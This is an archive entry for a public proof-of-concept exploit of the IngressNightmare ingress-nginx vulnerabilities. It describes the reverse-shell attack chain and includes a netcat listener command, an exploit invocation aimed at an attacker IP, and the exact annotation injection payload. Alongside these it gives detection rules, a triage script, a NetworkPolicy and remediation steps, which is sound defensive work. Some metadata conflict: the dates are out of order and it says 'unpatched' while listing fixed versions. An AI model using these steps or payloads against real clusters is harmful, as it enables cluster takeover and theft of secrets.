IngressNightmare - Kubernetes Ingress-NGINX Unauthenticated RCE
by Hakai Security (hakaioffsec) / QuimeraX Intelligence; original vulnerability discovery by Wiz Research · 2026-05-17
- Severity: Critical
- CVE: CVE-2025-1974 (primary); also CVE-2025-1097, CVE-2025-1098, CVE-2025-24514
- Category: cloud
- Affected product: Kubernetes Ingress-NGINX Controller (ingress-nginx)
- Affected versions: Ingress-NGINX Controller prior to 1.12.1 and prior to 1.11.5
- Disclosed: 2026-05-17
- Patch status: unpatched
References
- https://nvd.nist.gov/vuln/detail/CVE-2025-1974
- https://nvd.nist.gov/vuln/detail/CVE-2025-1097
- https://nvd.nist.gov/vuln/detail/CVE-2025-1098
- https://nvd.nist.gov/vuln/detail/CVE-2025-24514
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
- https://hakaisecurity.io/
- https://github.com/hakaioffsec/IngressNightmare-PoC
Archive entry: intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-03-26 |
| Author / Researcher | Hakai Security (hakaioffsec) / QuimeraX Intelligence; original vulnerability discovery by Wiz Research |
| CVE / Advisory | CVE-2025-1974 (primary); also CVE-2025-1097, CVE-2025-1098, CVE-2025-24514 |
| Category | cloud |
| Severity | Critical |
| CVSS Score | 9.8 (CVSSv3) |
| Status | Weaponized |
| Tags | RCE, Kubernetes, ingress-nginx, admission-controller, unauthenticated, nginx-config-injection, cluster-takeover, k8s, shared-object, reverse-shell |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Kubernetes Ingress-NGINX Controller (ingress-nginx) |
| Versions Affected | Ingress-NGINX Controller prior to 1.12.1 and prior to 1.11.5 |
| Language / Platform | Python 3.x (exploit), C (shared object payload); Kubernetes cluster environment |
| Authentication Required | No (unauthenticated, reachable from within pod network) |
| Network Access Required | Yes (access to ingress controller pod network or admission webhook endpoint) |
Summary
IngressNightmare is a chain of critical vulnerabilities (CVE-2025-1097, CVE-2025-1098, CVE-2025-24514, CVE-2025-1974) in the Kubernetes Ingress-NGINX admission controller. Discovered by Wiz Research, the vulnerabilities allow an unauthenticated attacker with access to the Kubernetes pod network to achieve Remote Code Execution on the ingress-nginx controller pod and subsequently read all secrets across all namespaces, enabling full cluster takeover. This PoC was developed by Hakai Security / QuimeraX Intelligence after Wiz did not release a functional exploit. It exploits unsafe nginx configuration injection via the admission webhook: a malicious shared object is placed on the controller pod and then loaded through an injected `ssl_engine` directive to obtain a reverse shell.
Vulnerability Details
Root Cause
The Ingress-NGINX admission webhook processes Ingress resource annotations without sufficient sanitization of user-supplied values. Specifically, annotations such as nginx.ingress.kubernetes.io/auth-tls-match-cn are injected directly into the generated nginx.conf file without proper escaping or validation (CWE-74: Improper Neutralization of Special Elements in Output). This allows an attacker to inject arbitrary nginx configuration directives, including ssl_engine, which instructs nginx to load a custom shared object from a path resolvable within the pod’s filesystem. Since the admission webhook is accessible from within the pod network without authentication, any pod in the cluster can trigger the exploit.
Attack Vector
- The attacker compiles a malicious C shared object (`evil_engine.so`) containing a constructor that executes a reverse shell command.
- The shared object is uploaded to the ingress-nginx controller pod via a crafted HTTP POST with a mismatched `Content-Length` header, keeping the connection and file descriptor open so the file persists at a predictable `/proc/{pid}/fd/{fd}` path.
- The attacker sends a crafted AdmissionReview request to the admission webhook endpoint, injecting an `ssl_engine` directive pointing to the file descriptor path (`/proc/{pid}/fd/{fd}`).
- The admission controller processes the forged nginx config, nginx loads the `ssl_engine` shared object, and the constructor payload executes the reverse shell.
- The file descriptor is brute-forced by iterating over process IDs (1-50) and file descriptor numbers (3-30).
Impact
Remote Code Execution as the ingress-nginx controller process within the Kubernetes cluster. The controller pod has a service account token with privileges to read all Kubernetes secrets across all namespaces. This enables extraction of credentials, certificates, and API keys for all applications in the cluster, and full cluster takeover by impersonating privileged service accounts.
Environment / Lab Setup
OS: Linux (attacker and Kubernetes nodes)
Target: Kubernetes cluster with Ingress-NGINX Controller < 1.12.1 / < 1.11.5
Attacker: Pod within the cluster or host with access to the pod network
Tools: Python 3.x, GCC compiler, pip (requests module), netcat (reverse shell listener)
Network: Access to ingress controller pod IP (public ingress URL) and admission webhook URL (internal)
Setup Steps
Proof of Concept
Step-by-Step Reproduction
1. Set up a reverse shell listener on your attacker host:

   ```shell
   nc -lvnp 443
   ```

2. Run the exploit, providing the public ingress URL, the internal admission webhook URL, and the attacker host:port:

   ```shell
   python3 exploit.py http://<INGRESS_URL> https://rke2-ingress-nginx-controller-admission.kube-system <ATTACKER_IP>:443
   ```

   Note: if the admission webhook is in a different namespace, append the namespace as a 4th argument.

3. Exploit workflow executed automatically:
   - `exploit.py` compiles `evil_engine.so` from `lib_template.c` with the attacker IP/port substituted.
   - Sends the `.so` to the ingress pod via HTTP with a mismatched Content-Length to keep the fd open.
   - Brute-forces `/proc/{pid}/fd/{fd}` against the admission webhook via threaded AdmissionReview requests.
   - Nginx loads the `ssl_engine` pointing to the fd path; the constructor fires the reverse shell.

4. Receive the reverse shell in the netcat listener.
Exploit Code
See `exploit.py` and `lib_template.c` in this folder.
Expected Output
```text
[+] Shared object compiled successfully
[*] Sending evil_engine.so to ingress pod...
Trying Proc: 1, FD: 3
Trying Proc: 1, FD: 4
...
Response for /proc/7/fd/15: 200
[reverse shell received on attacker netcat listener]
```
Screenshots / Evidence
- No screenshots provided in source repository. A demo video is available in the repo at `assets/9e893abf-5c01-4fcb-ad79-7115b429281f`.
Detection & Indicators of Compromise
Indicator: the annotation value carried in the malicious AdmissionReview request (the PoC's review.json) is an ordinary `auth-tls-match-cn` value followed by newlines, closing braces and an injected `ssl_engine` directive pointing into `/proc`:

```text
"nginx.ingress.kubernetes.io/auth-tls-match-cn": "CN=abc #(\\n){}\\n }}\\nssl_engine ../../../../../../proc/{pid}/fd/{fd};"
```

SIEM / IDS Rule (example, Suricata syntax; both `content` matches are bound to the request body, otherwise the first match would apply to any buffer):

```text
alert http any any -> $K8S_ADMISSION_WEBHOOK any (msg:"CVE-2025-1974 IngressNightmare ssl_engine Injection"; flow:established,to_server; content:"ssl_engine"; http_client_body; content:"/proc/"; within:50; http_client_body; sid:9002027; rev:1;)
```

The admission webhook is served over TLS, so this rule only fires where the sensor sees decrypted traffic; otherwise rely on the controller's own logs and on the network restrictions listed under Remediation.
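The following triage script is an added example, not code from the hakaioffsec PoC or from the ingress-nginx project. It covers the two defender tasks this entry implies: checking whether a controller image tag falls in the vulnerable ranges (prior to 1.12.1 / prior to 1.11.5, as stated above) and scanning Ingress annotations for nginx-config structure that a plain annotation value never legitimately contains (newlines, `{`/`}`, `;`, or an `ssl_engine` directive). Because the PoC posts its AdmissionReview straight to the webhook, the forged Ingress never reaches the API server, so an inventory of stored Ingress objects will not show a direct-to-webhook attempt; the scanner therefore accepts both the `kubectl get ingress -A -o json` list shape and an AdmissionReview body captured at the webhook. `load_module` in the directive list and the two sample documents are the author's own constructions, and the `-snippet` exemption reflects that snippet annotations are raw nginx config by design.

```python
"""Defender-side triage for IngressNightmare (CVE-2025-1974 and related CVEs).

Added example; not code from the hakaioffsec PoC or from ingress-nginx.
Checks: (1) whether a controller image tag is still in a vulnerable range,
(2) whether Ingress annotations carry nginx-config structure that a plain
annotation value never legitimately contains. Sample inputs are constructed.
"""
import json
import re

# Fixed releases stated in the advisory: 1.12.1 and 1.11.5.
FIXED = {(1, 11): 5, (1, 12): 1}
# nginx directives that never belong in an annotation value. ssl_engine is the
# one abused here; load_module is an added defender's choice (assumption).
DANGEROUS_DIRECTIVES = ("ssl_engine", "load_module")


def controller_is_patched(version: str) -> bool:
    """True if an ingress-nginx controller version carries the fix."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    if (major, minor) in FIXED:
        return patch >= FIXED[(major, minor)]
    # Newer than the 1.12 line is patched; older than 1.11 is not.
    return (major, minor) > (1, 12)


def iter_ingress_objects(doc: dict):
    """Yield Ingress objects from a kubectl List, an AdmissionReview, or one Ingress."""
    if doc.get("kind") == "AdmissionReview":
        obj = doc.get("request", {}).get("object")
        if obj:
            yield obj
    elif "items" in doc:
        yield from doc["items"]
    elif doc.get("kind") == "Ingress":
        yield doc


def suspicious_annotations(ingress: dict) -> list:
    """Return (annotation, reason) pairs for values that look like config injection."""
    findings = []
    annotations = ingress.get("metadata", {}).get("annotations", {})
    for key, value in annotations.items():
        if not key.startswith("nginx.ingress.kubernetes.io/"):
            continue
        value = str(value)
        for directive in DANGEROUS_DIRECTIVES:
            if re.search(rf"(^|\s|;|}})\s*{directive}\b", value):
                findings.append((key, f"contains nginx directive {directive}"))
        # *-snippet annotations are raw nginx config by design (and gated by the
        # controller's allow-snippet-annotations setting); skip structure checks.
        if key.endswith("-snippet"):
            continue
        if "\n" in value or "\r" in value:
            findings.append((key, "embedded newline"))
        if "{" in value or "}" in value:
            findings.append((key, "nginx block delimiter"))
        if ";" in value:
            findings.append((key, "directive terminator ';'"))
    return findings


def scan(doc: dict) -> dict:
    """Map namespace/name -> findings for every Ingress in the document."""
    report = {}
    for ing in iter_ingress_objects(doc):
        meta = ing.get("metadata", {})
        hits = suspicious_annotations(ing)
        if hits:
            report[f"{meta.get('namespace', '?')}/{meta.get('name', '?')}"] = hits
    return report


# Constructed AdmissionReview body, shaped like the PoC's review.json; the
# pid/fd values 7 and 15 mirror the page's "Expected Output" sample.
SAMPLE_REVIEW = {
    "kind": "AdmissionReview", "apiVersion": "admission.k8s.io/v1",
    "request": {"object": {"kind": "Ingress", "metadata": {
        "name": "evil", "namespace": "default",
        "annotations": {"nginx.ingress.kubernetes.io/auth-tls-match-cn":
                        "CN=abc #(\n){}\n }}\nssl_engine ../../../../../../proc/7/fd/15;"}}}},
}
# Constructed `kubectl get ingress -A -o json` output with a benign annotation.
SAMPLE_LIST = {"kind": "List", "items": [{"kind": "Ingress", "metadata": {
    "name": "shop", "namespace": "prod",
    "annotations": {"nginx.ingress.kubernetes.io/auth-tls-match-cn": "CN=client-a"}}}]}

if __name__ == "__main__":
    for tag in ("v1.11.4", "v1.11.5", "v1.12.0", "v1.12.1"):
        print(tag, "patched" if controller_is_patched(tag) else "VULNERABLE")
    print(json.dumps(scan(SAMPLE_REVIEW), indent=2))
    print(json.dumps(scan(SAMPLE_LIST), indent=2))  # {} -> nothing flagged
```

Run it against real data by piping `kubectl get ingress -A -o json` into `scan()`, and against the controller image tag from `kubectl -n <ns> get deploy -o jsonpath` into `controller_is_patched()`; a finding on a non-snippet annotation is worth treating as an incident rather than a misconfiguration.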
Remediation
| Action | Detail |
|---|---|
| Patch | Upgrade Ingress-NGINX Controller to 1.12.1 or 1.11.5 immediately |
| Workaround | Restrict admission webhook access to only the Kubernetes API Server using NetworkPolicy; temporarily disable the admission controller component if patching is not immediately possible |
| Config Hardening | Apply network policies preventing direct pod-to-webhook communication; audit all Ingress annotations for unexpected nginx directives; enable Kubernetes audit logging for AdmissionReview requests |
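The Workaround row above asks for a NetworkPolicy that lets only the Kubernetes API server reach the admission webhook. The manifest below is an added example written for this entry, not a resource shipped by the PoC repository or by the ingress-nginx project. It assumes the controller pods carry the upstream labels `app.kubernetes.io/name: ingress-nginx` and `app.kubernetes.io/component: controller`, that the webhook listens on its default port 8443, that the controller runs in the `ingress-nginx` namespace (on RKE2, as in the PoC invocation above, it is `kube-system`), and it uses an obviously placeholder CIDR for the control-plane nodes.

```yaml
# Added example, not from the PoC repo or the ingress-nginx project.
# Assumptions: upstream controller labels, webhook on 8443, control-plane
# nodes in 10.0.0.0/28 (PLACEHOLDER: substitute your control-plane node range).
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: ingress-nginx-admission-apiserver-only
  namespace: ingress-nginx        # kube-system on RKE2
spec:
  podSelector:
    matchLabels:
      app.kubernetes.io/name: ingress-nginx
      app.kubernetes.io/component: controller
  policyTypes:
    - Ingress
  ingress:
    # Public HTTP/HTTPS stays reachable from any source ...
    - ports:
        - protocol: TCP
          port: 80
        - protocol: TCP
          port: 443
    # ... while the admission webhook accepts connections only from the
    # control-plane nodes that host the API server. A pod elsewhere in the
    # cluster can no longer post AdmissionReview bodies to it directly.
    - from:
        - ipBlock:
            cidr: 10.0.0.0/28     # PLACEHOLDER control-plane CIDR
      ports:
        - protocol: TCP
          port: 8443
```

Two checks before rolling this out: NetworkPolicy is only enforced by a CNI that implements it and does not apply to a controller running with `hostNetwork: true`, and the API server's webhook calls must actually originate from the CIDR you allow (confirm from the webhook's connection logs). If kubelet probes or a metrics scraper reach the pod on other ports, add those ports to the first rule so the controller does not fail its health checks.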
References
- CVE-2025-1974
- CVE-2025-1097
- CVE-2025-1098
- CVE-2025-24514
- Wiz Research - IngressNightmare Blog Post
- Hakai Security
- Source Repository
Notes
The Wiz Research team discovered the vulnerability chain but did not publish a functional exploit; Hakai Security / QuimeraX built and released this independent PoC. The file descriptor persistence trick (sending a larger Content-Length than actual body to keep the connection and fd alive) is the key enabler for the attack. Review the review.json file’s annotation field to understand the exact injection format. The brute-force range for proc/fd can be extended but may generate significant noise. Auto-ingested from https://github.com/hakaioffsec/IngressNightmare-PoC on 2026-05-17.